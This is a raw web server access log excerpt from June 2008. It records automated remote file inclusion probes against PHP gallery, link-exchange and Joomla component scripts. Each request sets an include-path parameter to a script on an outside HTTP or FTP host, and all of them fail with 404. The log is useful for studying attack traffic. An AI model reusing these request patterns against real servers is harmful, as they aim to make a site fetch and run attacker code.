62.2.100.138 - - [11/Jun/2008:17:00:23 -0500] "GET /logs/access_log.1208649600/modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
62.2.100.138 - - [11/Jun/2008:17:00:23 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
62.2.100.138 - - [11/Jun/2008:17:00:24 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
62.2.100.138 - - [11/Jun/2008:17:00:30 -0500] "GET /logs/access_log.1204156800/modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
70.85.204.90 - - [11/Jun/2008:17:06:46 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/thenakal/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.85.204.90 - - [11/Jun/2008:17:06:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/thenakal/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.85.204.90 - - [11/Jun/2008:17:07:03 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/thenakal/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
70.85.204.90 - - [11/Jun/2008:17:07:03 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/thenakal/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
190.54.28.163 - - [11/Jun/2008:17:08:35 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
190.54.28.163 - - [11/Jun/2008:17:08:40 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
